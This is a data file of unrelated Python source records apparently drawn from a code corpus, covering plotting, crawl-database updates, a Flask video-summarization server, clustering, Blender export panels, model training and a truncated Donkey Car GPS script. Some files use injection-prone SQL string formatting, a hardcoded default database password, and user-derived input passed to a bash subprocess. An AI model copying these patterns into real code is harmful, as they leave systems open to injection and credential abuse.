+{"seq_id":"416852393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nPráctica TEII - Bloque 4 - Código de la sesión 3 de prácticas\n'''\n\nimport sys\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mult import mult\n\n\n# Función auxiliar: muestra la figura matplotlib pendiente y espera una pulsación de tecla:\n#@profile\ndef show_plot_and_wait_for_key():\n plt.draw()\n plt.pause(0.01)\n input(\"\")\n plt.close()\n\n\n# Función auxiliar que muestra en matplotlib los arrays de entrada y de salida:\ndef plot_values(values_in, values_out, line_else_bars=True, width=0.5):\n if line_else_bars == True:\n plt.plot(values_in, color = 'r', label=\"Input values\")\n plt.plot(values_out, color = 'g', label=\"Output values\") \n else:\n plt.bar(np.arange(len(values_in)) - width, values_in, width=width, color='r', \n label=\"Input values\")\n plt.bar(np.arange(len(values_out)), values_out, width=width, color='g', \n label=\"Output values\")\n\n plt.title('Matplotlib example (using {})'.format([\"bars\", \"lines\"][line_else_bars]))\n plt.legend()\n plt.xlabel('Array indices')\n plt.ylabel('Values')\n\n# Código main:\ndef main(): \n # Control de argumentos de línea de comandos:\n if len(sys.argv) != 2:\n print(\"Uso: {} scale\".format(sys.argv[0]))\n sys.exit(0)\n # Escala N:\n try:\n N = float(sys.argv[1])\n if not (-5.0 <= N <= 5.0):\n raise ValueError()\n except:\n print(\"N must be a float value between -5.0 and +5.0\")\n sys.exit(-1)\n\n # Generamos una serie aleatoria creciente, a partir de la suma acumulativa números aleatorios \n # entre 0 y 1:\n SIZE = 50 # Tamaño del array.\n inp_arr = np.cumsum(np.random.rand(SIZE))\n out_arr = np.zeros_like(inp_arr)\n\n # Llamada a la función externa a través de su wrapper, con la correspondiente toma de tiempo:\n t0 = time.time_ns()\n out_arr = mult(inp_arr, N)\n t_exec = (time.time_ns()-t0)/1.0e9\n print(\"La función mult ha tardado {} segundos en ejecutarse.\".format(t_exec))\n\n # Mostramos gráficas (de líneas y de barras) y terminamos: \n plot_values(inp_arr, out_arr)\n show_plot_and_wait_for_key()\n plot_values(inp_arr, out_arr, line_else_bars=False)\n show_plot_and_wait_for_key()\n \nif __name__ == '__main__':\n 
main()\n","sub_path":"src/Practica3.py","file_name":"Practica3.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"381323113","text":"import time\nimport logging\n\nfrom utils.sql import execute_sql, query_to_tuples\n\nlog = logging.getLogger(__name__)\n\n\ndef hitgroups(cid):\n r = execute_sql(\"select distinct group_id from hits_mv where crawl_id = %s\", cid)\n return [g[0] for g in r.fetchall()]\n\n\ndef last_crawlids(limit=10):\n r = execute_sql(\"select crawl_id from hits_mv order by crawl_id desc limit %s\", limit)\n return [c[0] for c in r.fetchall()]\n\n\ndef last_crawlid():\n return execute_sql(\"select crawl_id from hits_mv order by crawl_id desc limit 1;\").fetchall()[0][0]\n\n\ndef updatehitgroup(g, cid):\n \"\"\"Updates hits_mv.hits_available by subtracting current group's\n hits_available.\n\n \"\"\"\n\n prev = execute_sql(\"\"\"select hits_available from hits_mv\n where\n crawl_id between %s and %s and\n group_id = '%s'\n order by crawl_id desc\n limit 1;\"\"\" % (cid - 100, cid - 1, g)).fetchall()\n prev = prev[0][0] if prev else 0\n\n execute_sql(\"\"\"update hits_mv set hits_diff = hits_available - %s where\n group_id = '%s' and crawl_id = %s;\"\"\" % (prev, g, cid))\n\n\ndef update_cid(cid):\n \"\"\"Updates hits_diff on hits_mv record related to crawl with id equal to\n cid.\n\n \"\"\"\n st = time.time()\n count = 0\n for i, g in enumerate(query_to_tuples(\"select distinct group_id from hits_mv where crawl_id = %s\", cid)):\n g = g[0]\n if i == 0:\n log.info(\"processing %s, %s %s\", i, cid, g)\n\n updatehitgroup(g, cid)\n count += 1\n\n execute_sql(\"commit;\")\n\n log.info(\"Updated crawl {0} in {1}. {2} groups processed\".format(\n cid, time.time() - st, count))\n\n return count\n","sub_path":"app/mturk/main/management/commands/diffs.py","file_name":"diffs.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427891888","text":"from flask import Flask, jsonify ,render_template ,request, Response\nimport os\nimport csv\nimport json\nimport urllib.parse\nimport glob\nimport subprocess\nimport requests\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\n@app.route('/')\ndef index():\n name_list=[]\n with open(\"./name_list.csv\") as f:\n for videoId,videoName in csv.reader(f):\n name_list.append((videoId,videoName))\n return render_template(\"index.html\",name_list=name_list)\n\n@app.route('/post_url',methods=[\"POST\"])\ndef post_url():\n url = request.form[\"youtube_url\"]\n qs = urllib.parse.urlparse(url).query\n video_id = []\n try:\n video_id = urllib.parse.parse_qs(qs)[\"v\"]\n except KeyError:\n url = requests.get(request.form[\"youtube_url\"]).url\n qs = urllib.parse.urlparse(url).query\n video_id = urllib.parse.parse_qs(qs)[\"v\"]\n response = Response()\n csvfile = \"\"\n with open(\"./error.txt\") as f:\n for row in csv.reader(f):\n if(row[0] == video_id[0]):\n return Response(response=json.dumps([\"error\"]), status=200)\n with open(\"./making.txt\") as f:\n for row in csv.reader(f):\n if(row[0] == video_id[0]):\n return Response(response=json.dumps([\"making\"]), status=200)\n with open(\"./name_list.csv\") as f:\n for videoId,videoName in csv.reader(f):\n if(videoId==\"https://www.youtube.com/watch?v=\"+video_id[0]):\n csvfile = \"./summarization_by_comment_count_and_bert/\"+video_id[0]+\".csv\"\n if(csvfile!=\"\"):\n json_list = []\n with open(csvfile) 
as f:\n for row in csv.reader(f):\n json_list.append(row)\n return Response(response=json.dumps(json_list), status=200)\n\n tmp_files = glob.glob('./tmp/*')\n if(len(tmp_files)!=0):\n return Response(response=json.dumps([\"crowd\"]), status=200)\n\n subprocess.Popen( [\"bash\",\"make_summarization.sh\",\"https://www.youtube.com/watch?v=\"+video_id[0],video_id[0]])\n\n return Response(response=json.dumps([\"making\"]), status=200)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=80)\n","sub_path":"ML_server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"403189204","text":"# -*- coding: UTF-8 -*-\n\n# 挖坑不填的程序员\n\n\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as ft\n\n\ninput_file = 'scale_data.csv'\nk = 5\n\ndata = pd.read_csv(input_file, encoding='utf-8')\nkmodel = KMeans(n_clusters=k, n_jobs=4)\nkmodel.fit(data)\n\nr1 = pd.Series(kmodel.labels_)\nr1 = r1.value_counts()\nr2 = pd.DataFrame(kmodel.cluster_centers_)\nr3 = pd.Series([u'用户群1', u'用户群2', u'用户群3', u'用户群4', u'用户群5'])\nr = pd.concat([r3, r1, r2], axis=1)\nr.columns = ['聚类类别', '聚类个数'] + list(data.columns)\nr.to_csv('result_cluster.csv', encoding='utf-8', index=False)\n\n# 绘制图\nch_font = ft.FontProperties(fname='/Library/Fonts/Songti.ttc')\n\nlabels = np.array(list(data.columns))\ndata_length = 5\nr4 = r2.T\nr4.columns = list(data.columns)\n\nfig = plt.figure()\ny = []\n\nfor x in list(data.columns):\n dt = r4[x]\n dt = np.concatenate((dt, [dt[0]]))\n y.append(dt)\n\nax = fig.add_subplot(111, polar=True)\nangles = np.linspace(0, 2*np.pi, data_length, endpoint=False)\nangles = np.concatenate((angles, [angles[0]]))\n\nax.plot(angles, y[0], 'b-', linewidth=2)\nax.plot(angles, y[1], 'r-', linewidth=2)\nax.plot(angles, y[2], 'g-', linewidth=2)\nax.plot(angles, y[3], 'y-', linewidth=2)\nax.plot(angles, y[4], 'm-', linewidth=2)\n\nax.legend(r3, loc=(0.95, 0.90), labelspacing=0.1, prop=ch_font)\nax.set_thetagrids(angles * 180/np.pi, labels, fontproperties=ch_font)\nax.set_title('客户分析', va='bottom', fontproperties=ch_font)\n\nax.grid(True)\nplt.show()\n\n\n","sub_path":"customer_value_analysis/k-means_cluster.py","file_name":"k-means_cluster.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200839998","text":"import os\n\nPROJECT_PATH = os.path.abspath('')\nDATABASE = {\n 'main': {\n 'engine': 'postgresql',\n 'name': 'erp',\n 'user': 'postgres',\n 'pwd': 'postgres',\n 'host': 'localhost',\n 'port': '5432'\n }\n }\nPROJECT_TITLE = \"ERP\"\nADMIN_SESSION_DAY = 1\nUSER_SESSION_DAY = 7\nMODULES = (\n 'modules_management',\n 'user_management',\n 'setting.unit',\n 'setting.company',\n 'setting.vat',\n 'inventory.item',\n 'inventory.warehouse',\n 'inventory.item_delivery',\n #'inventory.item_out',\n #'inventory.item_in',\n 'production.production_item_out',\n 'production.production_machine',\n )\n","sub_path":"modules/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"450138123","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\nmemory = np.load('collision_memory.npy', allow_pickle=True)\n_memory = []\nfor data in memory:\n\tflag = 
False\n\teps = 0.1\n\tif (np.linalg.norm(data[2]) < 0.01):\n\t\tif np.abs(data[1][0]) > eps:\n\t\t\tflag = True\n\t\tif data[1][1] - data[0][1] > eps:\n\t\t\tflag = True\n\t\tif data[3][1] > eps:\n\t\t\tflag = True\n\t\tif np.abs(data[3][0] - data[0][0]) > eps:\n\t\t\tflag = True\n\tif flag:\n\t\t_memory.append(data)\n\tcontinue\n\tprint(data)\n\tplt.plot([0.29, 0.29-data[0][0]], [0, -data[0][1]], c='red')\n\tplt.plot([0.29, 0.29+data[1][0]], [0, data[1][1]], c='#FF1493')\n\tplt.plot([0, data[2][0]], [0, data[2][1]], c='#4B0082')\n\tplt.plot([0, data[3][0]], [0, data[3][1]], c='blue')\n\tplt.xlim(-1, 1)\n\tplt.ylim(-1, 1)\n\tplt.show()\nprint(len(memory), len(_memory))\nmemory = np.array(_memory)\ninputs = np.concatenate([memory[:, 0], memory[:, 2]], axis = 1)\noutputs = np.concatenate([memory[:, 1], memory[:, 3]], axis = 1)\n\t\ndef getCollisionModel():\n\tx = tf.keras.Input(4)\n\tm = tf.keras.layers.Dense(8, activation = 'relu', kernel_initializer = 'random_uniform')(x)\n\ty = tf.keras.layers.Dense(4, kernel_initializer = 'random_uniform')(m)\n\tmodel = tf.keras.Model(inputs = x, outputs = y)\n\tmodel.compile(optimizer = tf.keras.optimizers.Adam(lr = 1e-3, decay = 1e-8), loss=[\"mse\"], metrics = [\"mae\"])\n\treturn model\ncollision_model = getCollisionModel()\n\ncollision_model = tf.keras.models.load_model(\"collision.hdf5\")\ncollision_model.summary()\n\n'''\npred = collision_model.predict(inputs)\nfor i in range(10):\n\tprint(outputs[i])\n\tprint(pred[i])\n\tprint()\n#exit(0)\ncollision_model_checkpoint = tf.keras.callbacks.ModelCheckpoint(\"collision.hdf5\", monitor='loss', verbose=0, save_best_only=True)\nlog_dir=\"logs/collision\"\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\ntry:\n\tcollision_model.fit(inputs, outputs, validation_split = 0.2, epochs=1000, callbacks=[collision_model_checkpoint, tensorboard_callback])\nexcept:\n\tpass\n'''\nfor i in range(len(collision_model.get_layer('dense').get_weights())):\n\tprint(collision_model.get_layer('dense').get_weights()[i])\n\tprint('******************************************************')\nfor i in range(len(collision_model.get_layer('dense_1').get_weights())):\n\tprint(collision_model.get_layer('dense_1').get_weights()[i])\n\tprint('******************************************************')","sub_path":"collision_learning.py","file_name":"collision_learning.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458386813","text":"# All the custom panels and properties for all the different object types\n\nimport bpy\nfrom bpy.props import StringProperty, BoolProperty, EnumProperty, IntProperty, FloatProperty\n\n\"\"\" Various properties for each of the different node types \"\"\"\n\nclass NMSNodeProperties(bpy.types.PropertyGroup):\n \"\"\" Properties for the NMS Nodes \"\"\"\n # is the is_NMS_node needed??? (don't think so... 
flag for deletion...)\n is_NMS_node = BoolProperty(name = \"Is NMS Node?\",\n description = \"Enable if the object is a node in the scene file\",\n default = True)\n node_types = EnumProperty(name = \"Node Types\",\n description = \"Select what type of Node this will be\",\n items = [(\"Mesh\" , \"Mesh\" , \"Standard mesh for visible objects.\"),\n (\"Collision\", \"Collision\", \"Shape of collision for object.\"),\n (\"Locator\", \"Locator\", \"Locator object, used for interaction locations etc.\"),\n (\"Reference\", \"Reference\", \"Node used to allow other scenes to be placed at this point in space\"),\n (\"Joint\", \"Joint\", \"Node used primarily for animations. All meshes that are to be animated MUST be a direct child of a joint object\"),\n (\"Light\", \"Light\", \"Light that will emit light of a certain colour\")])\n override_name = StringProperty(name = \"Override name\",\n description = \"A name to be used to override the name given from blender. This should be used with caution and sparingly. Only use if you require multiple nodes in the scene to have the same name. Will not work for Collisions.\")\n\nclass NMSMeshProperties(bpy.types.PropertyGroup):\n has_entity = BoolProperty(name = \"Requires Entity\",\n description = \"Whether or not the mesh requires an entity file. Not all meshes require an entity file. Read the detailed guidelines in the readme for more details.\",\n default = False)\n material_path = StringProperty(name = \"Material\",\n description = \"(Optional) Path to material mbin file to use instead of automattical exporting material attached to this mesh.\")\n\nclass NMSLightProperties(bpy.types.PropertyGroup):\n intensity_value = FloatProperty(name = \"Intensity\",\n description = \"Intensity of the light.\")\n FOV_value = FloatProperty(name = \"FOV\",\n description = \"Field if View of the lightsource.\",\n default = 360,\n min = 0,\n max = 360)\n\nclass NMSAnimationProperties(bpy.types.PropertyGroup):\n anim_name = StringProperty(name = \"Animation Name\",\n description = \"Name of the animation. All animations with the same name here will be combined into one.\")\n anim_loops_choice = EnumProperty(name = \"Animation Type\",\n description = \"Type of animation\",\n items = [(\"OneShot\" , \"OneShot\" , \"Animation runs once (per trigger)\"),\n (\"Loop\", \"Loop\", \"Animation loops continuously\")])\n\nclass NMSLocatorProperties(bpy.types.PropertyGroup):\n has_entity = BoolProperty(name = \"Requires Entity\",\n description = \"Whether or not the mesh requires an entity file. Not all meshes require an entity file. 
Read the detailed guidelines in the readme for more details.\",\n default = False)\n\nclass NMSRotationProperties(bpy.types.PropertyGroup):\n speed = FloatProperty(name = \"Speed\",\n description = \"Speed of the rotation around the specified axis.\")\n\nclass NMSReferenceProperties(bpy.types.PropertyGroup):\n reference_path = StringProperty(name = \"Reference Path\",\n description = \"Path to scene to be referenced at this location.\")\n\nclass NMSSceneProperties(bpy.types.PropertyGroup):\n batch_mode = BoolProperty(name = \"Batch Mode\",\n description = \"If ticked, each direct child of this node will be exported separately\",\n default = False)\n group_name = StringProperty(name = \"Group Name\",\n description = \"Group name so that models that all belong in the same folder are placed there (path becomes group_name/name)\")\n create_tangents = BoolProperty(name = \"Create Tangents\",\n description = \"Whether or not to generate tangents along with the mesh conversion (Enable only if you are sure about your UV Map).\",\n default = True)\n dont_compile = BoolProperty(name = \"Don't compile to .mbin\",\n description = \"If true, the exml files will not be compiled to an mbin file. This saves a lot of time waiting for the geometry files to compile\",\n default = False) ### this needs to be removed\n AT_only = BoolProperty(name = \"ActionTriggers Only\",\n description = \"If this box is ticked, all the action trigger data will be exported directly to an ENTITY file in the specified location with the project name. Anything else in the project is ignored\",\n default = False)\n is_proc = BoolProperty(name = \"Is a proc-gen scene?\",\n description = \"If checked, then a new panel will appear that can be used to describe the proc-gen nature of the scene\",\n default = False)\n\nclass NMSCollisionProperties(bpy.types.PropertyGroup):\n collision_types = EnumProperty(name = \"Collision Types\",\n description = \"Type of collision to be used\",\n items = [(\"Mesh\" , \"Mesh\" , \"Mesh Collision\"),\n (\"Box\", \"Box\", \"Box (rectangular prism collision\"),\n (\"Sphere\", \"Sphere\", \"Spherical collision\"),\n (\"Cylinder\", \"Cylinder\", \"Cylindrical collision\")])\n transform_type = EnumProperty(name = \"Scale Transform\",\n description = \"Whether or not to use the transform data, or the dimensions of the primitive\",\n items = [(\"Transform\", \"Transform\", \"Use Scale transform data\"),\n (\"Dimensions\", \"Dimensions\", \"Use the inherent object dimensions (will also retain the transform data in the scene)\")])\n\nclass NMSDescriptorProperties(bpy.types.PropertyGroup):\n choice_types = EnumProperty(name = \"Proc type\",\n description = \"Whether or not to have the model always eselected, or randomly selected.\",\n items = [(\"Always\" , \"Always\" , \"Node is always rendered (provided parents are rendered)\"),\n (\"Random\", \"Random\", \"Node is randomly selected out of all others in the same hierarchy\")])\n proc_prefix = StringProperty(name = \"Proc prefix\",\n description = \"The prefix to put in front of the part name to indicate what procedural rule to be grouped with.\")\n \n\n\"\"\" Various panels for each of the property types \"\"\"\n\nclass NMSNodePropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Node Properties\"\n bl_idname = \"OBJECT_PT_node_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if 
context.object.name.startswith(\"NMS\") and not context.object.name.startswith(\"NMS_SCENE\"):\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSNode_props, \"node_types\", expand=True)\n row = layout.row()\n row.prop(obj.NMSNode_props, \"override_name\")\n\nclass NMSReferencePropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Reference Properties\"\n bl_idname = \"OBJECT_PT_reference_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Reference':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSReference_props, \"reference_path\")\n\nclass NMSMeshPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Mesh Properties\"\n bl_idname = \"OBJECT_PT_mesh_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Mesh' and not context.object.name.startswith(\"NMS_SCENE\"):\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSMesh_props, \"has_entity\")\n row = layout.row()\n row.prop(obj.NMSMesh_props, \"material_path\")\n\nclass NMSAnimationPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Animation Properties\"\n bl_idname = \"OBJECT_PT_animation_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.animation_data:\n if context.object.animation_data.action:\n return True\n else:\n return False\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSAnimation_props, \"anim_name\")\n row = layout.row()\n row.prop(obj.NMSAnimation_props, \"anim_loops_choice\", expand = True)\n\nclass NMSLocatorPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Locator Properties\"\n bl_idname = \"OBJECT_PT_locator_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Locator':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSLocator_props, \"has_entity\")\n\nclass NMSRotationPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Rotation Properties\"\n bl_idname = \"OBJECT_PT_rotation_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.upper() == 'ROTATION':\n return True\n else:\n 
return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSRotation_props, \"speed\")\n\nclass NMSLightPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Light Properties\"\n bl_idname = \"OBJECT_PT_light_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Light':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSLight_props, \"intensity_value\")\n row = layout.row()\n row.prop(obj.NMSLight_props, \"FOV_value\")\n\nclass NMSCollisionPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Collision Properties\"\n bl_idname = \"OBJECT_PT_collision_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n if context.object.name.startswith(\"NMS\") and context.object.NMSNode_props.node_types == 'Collision':\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSCollision_props, \"collision_types\", expand=True)\n row = layout.row()\n row.prop(obj.NMSCollision_props, \"transform_type\", expand=True)\n\nclass NMSScenePropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Scene Properties\"\n bl_idname = \"OBJECT_PT_scene_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n # this should only show for an object that is called NMS_SCENE\n if context.object.name.startswith(\"NMS_SCENE\"):\n return True\n else:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSScene_props, \"batch_mode\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"group_name\", expand = True)\n row = layout.row()\n row.prop(obj.NMSScene_props, \"create_tangents\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"dont_compile\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"AT_only\")\n row = layout.row()\n row.prop(obj.NMSScene_props, \"is_proc\")\n\nclass NMSDescriptorPropertyPanel(bpy.types.Panel):\n \"\"\"Creates a Panel in the scene context of the properties editor\"\"\"\n bl_label = \"NMS Descriptor Properties\"\n bl_idname = \"OBJECT_PT_descriptor_properties\"\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"object\"\n\n @classmethod\n def poll(cls, context):\n try:\n if (context.object.name.startswith(\"NMS\")\n and (context.object.NMSNode_props.node_types == 'Mesh' or\n context.object.NMSNode_props.node_types == \"Locator\" or\n context.object.NMSNode_props.node_types == \"Reference\")\n and bpy.context.scene.objects['NMS_SCENE'].NMSScene_props.is_proc == True\n and not context.object == bpy.context.scene.objects['NMS_SCENE']):\n return True\n else:\n return False\n except:\n return False\n\n def draw(self, context):\n layout = self.layout\n obj = context.object\n row = layout.row()\n row.prop(obj.NMSDescriptor_props, \"choice_types\", expand=False)\n row = layout.row()\n 
row.prop(obj.NMSDescriptor_props, \"proc_prefix\")\n\nclass NMSPanels():\n @staticmethod\n def register():\n # register the properties\n bpy.utils.register_class(NMSNodeProperties)\n bpy.utils.register_class(NMSSceneProperties)\n bpy.utils.register_class(NMSMeshProperties)\n bpy.utils.register_class(NMSReferenceProperties)\n bpy.utils.register_class(NMSLocatorProperties)\n bpy.utils.register_class(NMSLightProperties)\n bpy.utils.register_class(NMSRotationProperties)\n bpy.utils.register_class(NMSAnimationProperties)\n bpy.utils.register_class(NMSCollisionProperties)\n bpy.utils.register_class(NMSDescriptorProperties)\n # link the properties with the objects' internal variables\n bpy.types.Object.NMSNode_props = bpy.props.PointerProperty(type=NMSNodeProperties)\n bpy.types.Object.NMSScene_props = bpy.props.PointerProperty(type=NMSSceneProperties)\n bpy.types.Object.NMSMesh_props = bpy.props.PointerProperty(type=NMSMeshProperties)\n bpy.types.Object.NMSReference_props = bpy.props.PointerProperty(type=NMSReferenceProperties)\n bpy.types.Object.NMSLocator_props = bpy.props.PointerProperty(type=NMSLocatorProperties)\n bpy.types.Object.NMSRotation_props = bpy.props.PointerProperty(type=NMSRotationProperties)\n bpy.types.Object.NMSLight_props = bpy.props.PointerProperty(type=NMSLightProperties)\n bpy.types.Object.NMSAnimation_props = bpy.props.PointerProperty(type=NMSAnimationProperties)\n bpy.types.Object.NMSCollision_props = bpy.props.PointerProperty(type=NMSCollisionProperties)\n bpy.types.Object.NMSDescriptor_props = bpy.props.PointerProperty(type=NMSDescriptorProperties)\n # register the panels\n bpy.utils.register_class(NMSScenePropertyPanel)\n bpy.utils.register_class(NMSNodePropertyPanel)\n bpy.utils.register_class(NMSMeshPropertyPanel)\n bpy.utils.register_class(NMSReferencePropertyPanel)\n bpy.utils.register_class(NMSLocatorPropertyPanel)\n bpy.utils.register_class(NMSRotationPropertyPanel)\n bpy.utils.register_class(NMSLightPropertyPanel)\n bpy.utils.register_class(NMSAnimationPropertyPanel)\n bpy.utils.register_class(NMSCollisionPropertyPanel)\n bpy.utils.register_class(NMSDescriptorPropertyPanel)\n\n @staticmethod\n def unregister():\n # unregister the property classes\n bpy.utils.unregister_class(NMSNodeProperties)\n bpy.utils.unregister_class(NMSSceneProperties)\n bpy.utils.unregister_class(NMSMeshProperties)\n bpy.utils.unregister_class(NMSRotationProperties)\n bpy.utils.unregister_class(NMSReferenceProperties)\n bpy.utils.unregister_class(NMSLocatorProperties)\n bpy.utils.unregister_class(NMSLightProperties)\n bpy.utils.unregister_class(NMSAnimationProperties)\n bpy.utils.unregister_class(NMSCollisionProperties)\n bpy.utils.unregister_class(NMSDescriptorProperties)\n # delete the properties from the objects\n del bpy.types.Object.NMSNode_props\n del bpy.types.Object.NMSScene_props\n del bpy.types.Object.NMSMesh_props\n del bpy.types.Object.NMSReference_props\n del bpy.types.Object.NMSRotation_props\n del bpy.types.Object.NMSLocator_props\n del bpy.types.Object.NMSLight_props\n del bpy.types.Object.NMSAnimation_props\n del bpy.types.Object.NMSCollision_props\n del bpy.types.Object.NMSDescriptor_props\n # unregister the panels\n bpy.utils.unregister_class(NMSScenePropertyPanel)\n bpy.utils.unregister_class(NMSNodePropertyPanel)\n bpy.utils.unregister_class(NMSMeshPropertyPanel)\n bpy.utils.unregister_class(NMSReferencePropertyPanel)\n bpy.utils.unregister_class(NMSLocatorPropertyPanel)\n bpy.utils.unregister_class(NMSRotationPropertyPanel)\n 
bpy.utils.unregister_class(NMSLightPropertyPanel)\n bpy.utils.unregister_class(NMSAnimationPropertyPanel)\n bpy.utils.unregister_class(NMSCollisionPropertyPanel)\n bpy.utils.unregister_class(NMSDescriptorPropertyPanel)\n","sub_path":"BlenderExtensions/CustomPanels.py","file_name":"CustomPanels.py","file_ext":"py","file_size_in_byte":19954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612292523","text":"#!/usr/bin/env python3\n\"\"\"\ngps_manage.py\n\nScript to control donkey car with GPS navigation. Waypoints are set with GPS coordinates in degrees.\n\nCall: gps_manage.py -drive\n\"\"\"\n\n# import GPS Planner and other DK parts\nimport donkeycar as dk\nfrom donkeycar.parts.gps import GPS\nfrom donkeycar.parts.planner import Planner\nfrom donkeycar.vehicle import Vehicle\nfrom donkeycar.parts.actuator import PCA9685, PWMSteering, PWMThrottle\n\n# other important modules\nimport serial\nimport pynmea2\nimport time\nimport threading\n\n\ndef drive(cfg, goalLocation):\n \"\"\"\n drive(cfg, goalLocation)\n\n Add GPS, Planner, and actuator parts and call DK Vehicle.py to run car.\n @param: cfg - configuration file from dk calibration\n goalLocation - list of GPS coordinates in degrees\n @return: None\n \"\"\"\n # initialize vehicle\n V = Vehicle()\n\n # GPS is a DK part that will poll GPS data from serial port\n # and output current location in radians.\n gps = GPS(cfg.BAUD_RATE, cfg.PORT, cfg.TIMEOUT)\n\n # Planner is a DK part that calculates control signals to actuators based on current location\n # from GPS\n planner = Planner(goalLocation=goalLocation, steer_gain=cfg.STEERING_P_GAIN,\n throttle_gain=cfg.THROTTLE_P_GAIN)\n\n # Actuators: steering and throttle\n steering_controller = PCA9685(cfg.STEERING_CHANNEL)\n steering = PWMSteering(controller=steering_controller,\n left_pulse=cfg.STEERING_LEFT_PWM,\n right_pulse=cfg.STEERING_RIGHT_PWM)\n\n throttle_controller = PCA9685(cfg.THROTTLE_CHANNEL)\n throttle = PWMThrottle(controller=throttle_controller,\n max_pulse=cfg.THROTTLE_FORWARD_PWM,\n zero_pulse=cfg.THROTTLE_STOPPED_PWM,\n min_pulse=cfg.THROTTLE_REVERSE_PWM)\n\n # add threaded part for gps controller\n V.add(gps, outputs=[\"currLocation\", \"prevLocation\"], threaded=True)\n\n # add planner, actuator parts\n V.add(planner, 